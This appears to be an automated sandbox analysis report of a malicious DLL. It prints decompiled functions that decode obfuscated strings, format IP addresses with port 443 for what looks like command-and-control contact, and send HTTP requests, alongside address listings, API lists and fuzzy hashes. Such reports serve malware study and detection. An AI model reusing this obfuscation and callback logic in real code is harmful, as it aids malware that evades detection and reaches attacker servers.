										if(E6E77865C(_t146, _t318, _t318,  &_v24) == 0) {
											break;
										}
										_t298 = _v24;
										_t228 = _v36;
										if(_t298 == 0) {
											L31:
											_v20 = _t228;
											L32:
											_t160 = E6E77111C() + 4; // 0x4
											E6E778517(_t160, _t317, _t318);
											_t162 = E6E77111C() + 4; // 0x4
											E6E778517(_t162, _t317, _v32);
											_t234 = HeapAlloc(GetProcessHeap(), 0, 0x20);
											_v32 = _t234;
											if(_t234 != 0) {
												_v28 = _v28 & 0x00000000;
												_t318 = 0;
												_v48 = _t317;
												_v36 = 0;
												if( *_t317 == 0) {
													L42:
													_t235 = GetProcessHeap();
													_t317 = HeapFree;
													HeapFree(_t235, 0, HeapFree);
													_t301 = _v128;
													if( *(_t301 + 4) != 0) {
														HeapFree(GetProcessHeap(), 0,  *(_t301 + 4));
														_t301 = _v128;
													}
													 *(_t301 + 4) = _v32;
													 *(_t301 + 8) = _t318;
													goto L24;
												}
												_t283 = _v32;
												while(_t318 < 8) {
													_v48 = _v48 & 0x00000000;
													_v52 = 6;
													_v51 = 0x3a;
													_v50 = 0;
													_t244 = E6E77C10D(_t283, _t317, _t318, _t317, E6E773D05( &_v52),  &_v28);
													_t317 = _v28;
													_t326 = _t326 + 0xc;
													_t319 = _t244;
													_t312 =  &(_t319[lstrlenA(_t319)]);
													_t247 = E6E773F99(_t319,  &(_t319[lstrlenA(_t319)]),  &_v48);
													_t318 = _v36;
													if(_t247 != 0) {
														 *((intOrPtr*)(_t283 + _t318 * 4)) = _v48;
														_t318 = _t318 + 1;
														_v36 = _t318;
													}
													if( *_t317 != 0) {
														continue;
													} else {
														break;
													}
												}
												_t317 = _v124;
												_t282 = GetProcessHeap;
												goto L42;
											}
											HeapFree(GetProcessHeap(), _t234, _t317);
											goto L23;
										}
										_t305 = HeapReAlloc(GetProcessHeap(), 0, _t317, _t228 + _t298);
										_v48 = _t305;
										if(_t305 == 0) {
											break;
										}
										_t317 = _t305;
										_v124 = _t317;
										_t154 = E6E77111C() + 4; // 0x4
										_t294 = _t154;
										if(E6E7785BB(_t294, _t317, _t318, _t305 + _v36, _v24,  &_v12) == 0) {
											_push(_v48);
											L20:
											HeapFree(GetProcessHeap(), 0, ??);
											goto L21;
										}
										_t228 = _v36 + _v12;
										_v36 = _t228;
										if(_v24 > 0) {
											continue;
										}
										goto L31;
									}
									L19:
									_push(_t317);
									goto L20;
								}
								_t139 = E6E77111C() + 4; // 0x4
								if(E6E7785BB(_t139, _t317, _t318, _t317, _v20,  &_v12) != 0) {
									goto L32;
								}
								goto L19;
							}
							_push(_t282);
							_t220 = E6E77111C() + _t317;
							goto L22;
						}
						_t320 = _t290;
						_t284 = 0x7f;
						do {
							_t308 = 0x1f;
							asm("cdq");
							_t266 = _t284 + (_t308 - ( *(_t323 + _t320 - 0x28) & 0x000000ff)) * 0x1a % _t284;
							asm("cdq");
							_t312 = _t266 % _t284;
							 *(_t323 + _t320 - 0x28) = _t266 % _t284;
							_t320 = _t320 + 1;
						} while (_t320 < _t317);
						_t282 = _v32;
						_v40 = 1;
						goto L13;
					}
					_t321 = 0x7f;
					do {
						asm("cdq");
						_t273 = _t321 + (( *(_t323 + _t290 - 0x74) & 0x000000ff) - 0x28) * 0xa % _t321;
						asm("cdq");
						_t312 = _t273 % _t321;
						 *(_t323 + _t290 - 0x74) = _t273 % _t321;
						_t290 = _t290 + 1;
					} while (_t290 < 0x20);
					_v88 = 1;
					_t290 = 0;
					goto L9;
				}
				_t322 = 0;
				do {
					_t310 = 8;
					asm("cdq");
					_t279 = _t281 + (_t310 - ( *(_t323 + _t322 - 0x50) & 0x000000ff)) * 0x14 % _t281;
					asm("cdq");
					_t312 = _t279 % _t281;
					 *(_t323 + _t322 - 0x50) = _t279 % _t281;
					_t322 = _t322 + 1;
				} while (_t322 < 0x17);
				_v61 = 1;
				goto L4;
			}



























































































































                                                      0x6e77405f
                                                      0x6e774066
                                                      0x6e77406c
                                                      0x6e77406e
                                                      0x6e774071
                                                      0x6e774075
                                                      0x6e774079
                                                      0x6e77407d
                                                      0x6e774081
                                                      0x6e774085
                                                      0x6e774089
                                                      0x6e77408d
                                                      0x6e774091
                                                      0x6e774095
                                                      0x6e774099
                                                      0x6e77409d
                                                      0x6e7740a1
                                                      0x6e7740a5
                                                      0x6e7740a9
                                                      0x6e7740ad
                                                      0x6e7740b1
                                                      0x6e7740b5
                                                      0x6e7740b9
                                                      0x6e7740bd
                                                      0x6e7740c1
                                                      0x6e7740c5
                                                      0x6e7740c9
                                                      0x6e7740d0
                                                      0x6e7740da
                                                      0x6e7740db
                                                      0x6e774105
                                                      0x6e774105
                                                      0x6e77410b
                                                      0x6e77410c
                                                      0x6e77410e
                                                      0x6e774115
                                                      0x6e77411e
                                                      0x6e774120
                                                      0x6e774125
                                                      0x6e774320
                                                      0x6e774322
                                                      0x6e774330
                                                      0x6e774330
                                                      0x6e77412b
                                                      0x6e77412f
                                                      0x6e774133
                                                      0x6e774137
                                                      0x6e77413e
                                                      0x6e774140
                                                      0x6e774143
                                                      0x6e774147
                                                      0x6e77414b
                                                      0x6e77414f
                                                      0x6e774153
                                                      0x6e774157
                                                      0x6e77415b
                                                      0x6e77415f
                                                      0x6e774163
                                                      0x6e774167
                                                      0x6e77416b
                                                      0x6e77416f
                                                      0x6e774173
                                                      0x6e774177
                                                      0x6e77417b
                                                      0x6e77417f
                                                      0x6e774183
                                                      0x6e774187
                                                      0x6e77418b
                                                      0x6e77418f
                                                      0x6e774193
                                                      0x6e774196
                                                      0x6e77419a
                                                      0x6e77419e
                                                      0x6e7741a1
                                                      0x6e7741a4
                                                      0x6e7741a8
                                                      0x6e7741ac
                                                      0x6e7741b0
                                                      0x6e7741b4
                                                      0x6e7741b8
                                                      0x6e7741bc
                                                      0x6e7741c3
                                                      0x6e7741c9
                                                      0x6e7741f4
                                                      0x6e7741f4
                                                      0x6e7741f8
                                                      0x6e7741fc
                                                      0x6e774200
                                                      0x6e774207
                                                      0x6e77420e
                                                      0x6e77423d
                                                      0x6e77423d
                                                      0x6e774243
                                                      0x6e774257
                                                      0x6e77425a
                                                      0x6e77425f
                                                      0x6e774263
                                                      0x6e774272
                                                      0x6e774273
                                                      0x6e774274
                                                      0x6e77427e
                                                      0x6e774288
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77428e
                                                      0x6e774292
                                                      0x6e774299
                                                      0x6e7742a8
                                                      0x6e7742ab
                                                      0x6e7742b4
                                                      0x6e7742c3
                                                      0x6e7742c5
                                                      0x6e7742ca
                                                      0x6e774300
                                                      0x6e774306
                                                      0x6e774309
                                                      0x6e77430e
                                                      0x6e774316
                                                      0x6e774319
                                                      0x6e77431b
                                                      0x00000000
                                                      0x6e77431b
                                                      0x6e7742ce
                                                      0x6e7742d4
                                                      0x6e774331
                                                      0x6e774334
                                                      0x6e774337
                                                      0x6e774337
                                                      0x6e774338
                                                      0x6e774343
                                                      0x6e77434d
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77434f
                                                      0x6e774352
                                                      0x6e774357
                                                      0x6e7743a2
                                                      0x6e7743a2
                                                      0x6e7743a5
                                                      0x6e7743ab
                                                      0x6e7743ae
                                                      0x6e7743bb
                                                      0x6e7743be
                                                      0x6e7743ca
                                                      0x6e7743d0
                                                      0x6e7743d5
                                                      0x6e7743ef
                                                      0x6e7743f3
                                                      0x6e7743f8
                                                      0x6e7743fb
                                                      0x6e7743fe
                                                      0x6e77446b
                                                      0x6e77446e
                                                      0x6e774470
                                                      0x6e774477
                                                      0x6e774479
                                                      0x6e774480
                                                      0x6e77448a
                                                      0x6e77448c
                                                      0x6e77448c
                                                      0x6e774492
                                                      0x6e774497
                                                      0x00000000
                                                      0x6e774497
                                                      0x6e774400
                                                      0x6e774403
                                                      0x6e774408
                                                      0x6e77440f
                                                      0x6e774413
                                                      0x6e77441d
                                                      0x6e774429
                                                      0x6e77442e
                                                      0x6e774431
                                                      0x6e774434
                                                      0x6e774443
                                                      0x6e774446
                                                      0x6e77444b
                                                      0x6e774451
                                                      0x6e774456
                                                      0x6e774459
                                                      0x6e77445a
                                                      0x6e77445a
                                                      0x6e774460
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e774460
                                                      0x6e774462
                                                      0x6e774465
                                                      0x00000000
                                                      0x6e774465
                                                      0x6e7743dc
                                                      0x00000000
                                                      0x6e7743dc
                                                      0x6e774368
                                                      0x6e77436a
                                                      0x6e77436f
                                                      0x00000000
                                                      0x00000000
                                                      0x6e774374
                                                      0x6e77437d
                                                      0x6e774387
                                                      0x6e774387
                                                      0x6e774391
                                                      0x6e7743e7
                                                      0x6e7742f5
                                                      0x6e7742fa
                                                      0x00000000
                                                      0x6e7742fa
                                                      0x6e774396
                                                      0x6e77439d
                                                      0x6e7743a0
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7743a0
                                                      0x6e7742f4
                                                      0x6e7742f4
                                                      0x00000000
                                                      0x6e7742f4
                                                      0x6e7742e4
                                                      0x6e7742ee
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7742ee
                                                      0x6e774265
                                                      0x6e77426b
                                                      0x00000000
                                                      0x6e77426b
                                                      0x6e774212
                                                      0x6e774214
                                                      0x6e774215
                                                      0x6e77421e
                                                      0x6e774224
                                                      0x6e774227
                                                      0x6e77422a
                                                      0x6e77422b
                                                      0x6e77422d
                                                      0x6e774231
                                                      0x6e774232
                                                      0x6e774236
                                                      0x6e774239
                                                      0x00000000
                                                      0x6e774239
                                                      0x6e7741cd
                                                      0x6e7741ce
                                                      0x6e7741db
                                                      0x6e7741de
                                                      0x6e7741e1
                                                      0x6e7741e2
                                                      0x6e7741e4
                                                      0x6e7741e8
                                                      0x6e7741e9
                                                      0x6e7741ee
                                                      0x6e7741f2
                                                      0x00000000
                                                      0x6e7741f2
                                                      0x6e7740dd
                                                      0x6e7740df
                                                      0x6e7740e8
                                                      0x6e7740ee
                                                      0x6e7740f1
                                                      0x6e7740f4
                                                      0x6e7740f5
                                                      0x6e7740f7
                                                      0x6e7740fb
                                                      0x6e7740fc
                                                      0x6e774101
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 6E77111C: __EH_prolog3.LIBCMT ref: 6E771123
                                                        • Part of subcall function 6E773E54: HttpSendRequestA.WININET(0000000A,00000007,0000004A,00000000,00000000,00000063,00000000,?), ref: 6E773EF4
                                                      • GetProcessHeap.KERNEL32(00000000,?,00000000,20000005,?,?,?,00000000,00000000,00000000,?,?,00000000,00000052,00000020,00000000), ref: 6E7742BA
                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,00000052,00000020,00000000), ref: 6E7742BD
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00000052,00000020,00000000), ref: 6E7742F7
                                                      • HeapFree.KERNEL32(00000000), ref: 6E7742FA
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00000052,00000020), ref: 6E77435F
                                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00000052,00000020,00000000), ref: 6E774362
                                                      • GetProcessHeap.KERNEL32(00000000,00000020,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00000052), ref: 6E7743C7
                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00000052,00000020,00000000), ref: 6E7743CA
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00000052,00000020,00000000), ref: 6E7743D9
                                                      • HeapFree.KERNEL32(00000000), ref: 6E7743DC
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000052,00000020,00000000), ref: 6E77443B
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00000052,00000020,00000000), ref: 6E77446E
                                                      • HeapFree.KERNEL32(00000000), ref: 6E774477
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00000052,00000020,00000000), ref: 6E774487
                                                      • HeapFree.KERNEL32(00000000), ref: 6E77448A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$Alloc$H_prolog3HttpRequestSendlstrlen
                                                      • String ID: $ $%$%$($+$5$:$;$<$?$B$B$G$I$M$R$T$T$U$U$U$Z$`$b$b$f$f$h$h$h$o$o$r$r$s$u$x$x$x$x$x$~
                                                      • API String ID: 1328595153-1023700869
                                                      • Opcode ID: 26452b1aadb5839be3ccc0ef8a4928edd6f07a215e8188e116d106ad9e4bca27
                                                      • Instruction ID: 866f46385abbcc38c6e5ddf4777613ecb3857dedc35199b31cd228332e59cb29
                                                      • Opcode Fuzzy Hash: 26452b1aadb5839be3ccc0ef8a4928edd6f07a215e8188e116d106ad9e4bca27
                                                      • Instruction Fuzzy Hash: 69E19270D082889EEF11CBF8D948BEEBFB9AF16308F144469D4447B292D7B94909DB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E773807, Relevance: 36.1, APIs: 1, Strings: 23, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E6E773807(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				unsigned int _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t54;
				unsigned int _t69;
				signed int _t83;
				unsigned int _t85;
				void* _t86;
				signed int _t91;
				void* _t93;
				signed int _t97;
				intOrPtr* _t98;
				signed int _t99;

				_t54 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t54 ^ _t99;
				_t98 = __ecx;
				_t85 = E6E77449F(__ecx + 8, _a4);
				_v116 = _t85;
				if(_t85 != 0xffffffff && _t85 != 0x7f && _t85 != 0xc0 && _t85 != 0xa && _t85 != 0xac) {
					_v112 = 0x3e;
					_v111 = 0x46;
					_v110 = 0x46;
					_v109 = 0x19;
					_v108 = 0x1b;
					_v107 = 0x74;
					_v106 = 0x18;
					_v105 = 0x18;
					_v104 = 0x66;
					_v103 = 0x3e;
					_v102 = 0x71;
					_v101 = 0x6c;
					_v100 = 0x66;
					_v99 = 0x3e;
					_v98 = 0x71;
					_v97 = 0x6c;
					_v96 = 0x66;
					_v95 = 0x3e;
					_v94 = 0x71;
					_v93 = 0x6c;
					_v92 = 0x66;
					_v91 = 0x3e;
					_v90 = 0x71;
					_v89 = 0x74;
					_v88 = 0x66;
					_v87 = 0x71;
					_v86 = 0x23;
					_v85 = 0;
					if(_v85 == 0) {
						_t97 = 0x7f;
						_t86 = 0;
						do {
							_t93 = 0x23;
							asm("cdq");
							_t83 = _t97 + (_t93 - ( *(_t99 + _t86 - 0x6c) & 0x000000ff)) * 0x3e % _t97;
							asm("cdq");
							_t95 = _t83 % _t97;
							 *(_t99 + _t86 - 0x6c) = _t83 % _t97;
							_t86 = _t86 + 1;
						} while (_t86 < 0x1b);
						_t85 = _v116;
						_v85 = 1;
					}
					_push(0x1bb);
					_t91 = 0xfffffffe;
					_t69 = _t85;
					wsprintfA( &_v84,  &_v112, _t85 & 0x000000ff, (_t69 >> 0x00000008 ^ _t91) & 0x000000ff, (_t85 >> 0x00000010 ^ _t91) & 0x000000ff, (_t85 >> 0x00000018 ^ _t91) & 0x000000ff);
					E6E773519(_t98, _t97,  &_v84);
				}
				return E6E778727(_t85, _v8 ^ _t99, _t95, _t97, _t98);
			}
















































                                                      0x6e77380d
                                                      0x6e773814
                                                      0x6e77381c
                                                      0x6e773828
                                                      0x6e77382a
                                                      0x6e773830
                                                      0x6e77385a
                                                      0x6e77385e
                                                      0x6e773862
                                                      0x6e773866
                                                      0x6e77386a
                                                      0x6e77386e
                                                      0x6e773872
                                                      0x6e773876
                                                      0x6e77387a
                                                      0x6e77387e
                                                      0x6e773882
                                                      0x6e773886
                                                      0x6e77388a
                                                      0x6e77388e
                                                      0x6e773892
                                                      0x6e773896
                                                      0x6e77389a
                                                      0x6e77389e
                                                      0x6e7738a2
                                                      0x6e7738a6
                                                      0x6e7738aa
                                                      0x6e7738ae
                                                      0x6e7738b2
                                                      0x6e7738b6
                                                      0x6e7738ba
                                                      0x6e7738be
                                                      0x6e7738c2
                                                      0x6e7738c9
                                                      0x6e7738d1
                                                      0x6e7738d5
                                                      0x6e7738d6
                                                      0x6e7738d8
                                                      0x6e7738e1
                                                      0x6e7738e7
                                                      0x6e7738ea
                                                      0x6e7738ed
                                                      0x6e7738ee
                                                      0x6e7738f0
                                                      0x6e7738f4
                                                      0x6e7738f5
                                                      0x6e7738fa
                                                      0x6e7738fd
                                                      0x6e7738fd
                                                      0x6e773901
                                                      0x6e773908
                                                      0x6e77391f
                                                      0x6e773938
                                                      0x6e773947
                                                      0x6e773947
                                                      0x6e77395e

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: wsprintf
                                                      • String ID: #$>$>$>$>$>$F$F$f$f$f$f$f$l$l$l$q$q$q$q$q$t$t
                                                      • API String ID: 2111968516-4043613234
                                                      • Opcode ID: 8e9ae07c0524e8794ad68ff896a975a8f6d8011eac7e2e2fbb9a48dc7928067c
                                                      • Instruction ID: e9e0099e923a9e5c35f7d4c8776b9ab4a96b772d2c0b71739488cfcae75b9a35
                                                      • Opcode Fuzzy Hash: 8e9ae07c0524e8794ad68ff896a975a8f6d8011eac7e2e2fbb9a48dc7928067c
                                                      • Instruction Fuzzy Hash: 1741C520E083CC9DEF11C6FDC9487EEBFE94B12318F04016AD498AF2D6C2AA5559C732
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E772CF7, Relevance: 34.6, APIs: 3, Strings: 20, Instructions: 138memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E6E772CF7() {
				signed int _v8;
				char _v20;
				signed short _v30;
				signed short _v34;
				signed short _v36;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t77;
				intOrPtr _t80;
				intOrPtr* _t83;
				void* _t92;
				signed int _t99;
				signed int _t105;
				void* _t108;
				char _t109;
				char _t115;
				void* _t116;
				void* _t121;
				signed int _t123;
				char _t124;
				long _t125;
				signed int _t126;
				signed int _t127;
				void* _t130;

				_t77 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t77 ^ _t127;
				_t109 = 0;
				_t125 = 8;
				_t130 =  *0x6e78d3b4 - _t109; // 0x255d130
				if(_t130 != 0) {
					L2:
					_push(_t121);
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t80 = E6E77111C();
					_v68 = 0x7e;
					_v67 = 0x59;
					_v66 = 7;
					_v65 = 0x23;
					_v64 = 0x16;
					_v63 = 4;
					_v62 = 7;
					_v61 = 0x59;
					_v60 = 0x71;
					_v59 = 0x26;
					_v58 = 0x65;
					_v57 = 0x71;
					_v56 = 0x59;
					_v55 = 0x28;
					_v72 = _t80;
					_v54 = _t109;
					_t123 = 0x7f;
					if(_v54 == _t109) {
						_t124 = _t109;
						_t126 = 0x7f;
						do {
							_t116 = 0x28;
							asm("cdq");
							_t105 = _t126 + (_t116 - ( *(_t127 + _t124 - 0x40) & 0x000000ff)) * 0x2a % _t126;
							asm("cdq");
							_t118 = _t105 % _t126;
							 *(_t127 + _t124 - 0x40) = _t105 % _t126;
							_t124 = _t124 + 1;
						} while (_t124 < 0xe);
						_t125 = 8;
						_v54 = 1;
						_t123 = 0x7f;
					}
					_t83 = E6E77657F(_v72,  &_v68);
					 *_t83( &_v36);
					_v52 = 0x3f;
					_v51 = 0x52;
					_v50 = 0x70;
					_v49 = 0x1c;
					_v48 = 0x3f;
					_v47 = 0x52;
					_v46 = 0x61;
					_v45 = 0x1c;
					_v44 = 0x3f;
					_v43 = 0x52;
					_v42 = 0x61;
					_v41 = 0x1c;
					_v40 = 0x67;
					_v39 = _t109;
					if(_v39 == _t109) {
						_t115 = _t109;
						do {
							asm("cdq");
							_t99 = _t123 + (( *(_t127 + _t115 - 0x30) & 0x000000ff) - 0x67) * 0x22 % _t123;
							asm("cdq");
							_t118 = _t99 % _t123;
							 *(_t127 + _t115 - 0x30) = _t99 % _t123;
							_t115 = _t115 + 1;
						} while (_t115 < 0xd);
						_v39 = 1;
					}
					wsprintfA( &_v20,  &_v52, _v36 & 0x0000ffff, _v34 & 0x0000ffff, _v30 & 0x0000ffff);
					_pop(_t121);
					do {
						_t92 =  *0x6e78d3b4; // 0x255d130
						 *((char*)(_t109 + _t92)) =  *((intOrPtr*)(_t127 + _t109 - 0x10));
						_t109 = _t109 + 1;
						_t125 = _t125 - 1;
					} while (_t125 != 0);
				} else {
					_t108 = HeapAlloc(GetProcessHeap(), 0, _t125);
					 *0x6e78d3b4 = _t108;
					if(_t108 != 0) {
						goto L2;
					}
				}
				return E6E778727(_t109, _v8 ^ _t127, _t118, _t121, _t125);
			}



























































                                                      0x6e772cfd
                                                      0x6e772d04
                                                      0x6e772d09
                                                      0x6e772d0d
                                                      0x6e772d0e
                                                      0x6e772d14
                                                      0x6e772d32
                                                      0x6e772d32
                                                      0x6e772d38
                                                      0x6e772d39
                                                      0x6e772d3a
                                                      0x6e772d3b
                                                      0x6e772d3c
                                                      0x6e772d41
                                                      0x6e772d45
                                                      0x6e772d49
                                                      0x6e772d4d
                                                      0x6e772d51
                                                      0x6e772d55
                                                      0x6e772d59
                                                      0x6e772d5d
                                                      0x6e772d61
                                                      0x6e772d65
                                                      0x6e772d69
                                                      0x6e772d6d
                                                      0x6e772d71
                                                      0x6e772d75
                                                      0x6e772d79
                                                      0x6e772d7f
                                                      0x6e772d84
                                                      0x6e772d88
                                                      0x6e772d8c
                                                      0x6e772d8e
                                                      0x6e772d8f
                                                      0x6e772d98
                                                      0x6e772d9e
                                                      0x6e772da1
                                                      0x6e772da4
                                                      0x6e772da5
                                                      0x6e772da7
                                                      0x6e772dab
                                                      0x6e772dac
                                                      0x6e772db3
                                                      0x6e772db6
                                                      0x6e772dba
                                                      0x6e772dba
                                                      0x6e772dc2
                                                      0x6e772dcb
                                                      0x6e772dcd
                                                      0x6e772dd1
                                                      0x6e772dd5
                                                      0x6e772dd9
                                                      0x6e772ddd
                                                      0x6e772de1
                                                      0x6e772de5
                                                      0x6e772de9
                                                      0x6e772ded
                                                      0x6e772df1
                                                      0x6e772df5
                                                      0x6e772df9
                                                      0x6e772dfd
                                                      0x6e772e04
                                                      0x6e772e0a
                                                      0x6e772e0c
                                                      0x6e772e0e
                                                      0x6e772e1b
                                                      0x6e772e1e
                                                      0x6e772e21
                                                      0x6e772e22
                                                      0x6e772e24
                                                      0x6e772e28
                                                      0x6e772e29
                                                      0x6e772e2e
                                                      0x6e772e2e
                                                      0x6e772e49
                                                      0x6e772e52
                                                      0x6e772e53
                                                      0x6e772e53
                                                      0x6e772e5c
                                                      0x6e772e5f
                                                      0x6e772e60
                                                      0x6e772e60
                                                      0x6e772d16
                                                      0x6e772d1f
                                                      0x6e772d25
                                                      0x6e772d2c
                                                      0x00000000
                                                      0x00000000
                                                      0x6e772d2c
                                                      0x6e772e72

                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000008,?,00000000), ref: 6E772D18
                                                      • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 6E772D1F
                                                      • wsprintfA.USER32 ref: 6E772E49
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesswsprintf
                                                      • String ID: #$&$($?$?$?$R$R$R$Y$Y$Y$a$a$e$g$p$q$q$~
                                                      • API String ID: 659108358-4051256392
                                                      • Opcode ID: 04523d245198781257386475f103f4c88f12fdcc6d82b505a7433ed5cc277c2e
                                                      • Instruction ID: ce235d67644e53ffe7a35a6c881749bdca0d0026f803b711e5df95b970390f3e
                                                      • Opcode Fuzzy Hash: 04523d245198781257386475f103f4c88f12fdcc6d82b505a7433ed5cc277c2e
                                                      • Instruction Fuzzy Hash: E0517660D482DCEDEF12C7FCD5487EEBFB85F2A208F080069E5807B192D6A95548C735
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E804287, Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                                      • String ID:
                                                      • API String ID: 2719235668-0
                                                      • Opcode ID: ef216fdfe1094acef2d3af41550391719792d0fc2968179248b763f4d50795ef
                                                      • Instruction ID: 78d8f5d45f5216ffecae9259bd14d06c85e60a37b3962b3767710d9ee923b84d
                                                      • Opcode Fuzzy Hash: ef216fdfe1094acef2d3af41550391719792d0fc2968179248b763f4d50795ef
                                                      • Instruction Fuzzy Hash: 68D18B71D44701AFDB50DFE98C94AAE7BB89FA2324F014E6DE924973E0EB359502C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7E9683, Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 3b444c30f588f8353bc97b5e5a6e6eeae0b1eaec7641f75315d75a204ba8873b
                                                      • Instruction ID: 31c101123b265649e529df532e1300ac0b3abaa6fa520c34b3394d1e38d4be3b
                                                      • Opcode Fuzzy Hash: 3b444c30f588f8353bc97b5e5a6e6eeae0b1eaec7641f75315d75a204ba8873b
                                                      • Instruction Fuzzy Hash: 7CB1A072D00206AFDB11CFE9C980BEEB7B8FF58304F1044A9E995A7761D775A9428B60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E774CC5, Relevance: 22.7, APIs: 1, Strings: 14, Instructions: 158stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 73%
                                                      			E6E774CC5(intOrPtr __ecx, intOrPtr __edx, char _a4) {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				void* __edi;
				void* __ebp;
				void* _t100;
				intOrPtr* _t103;
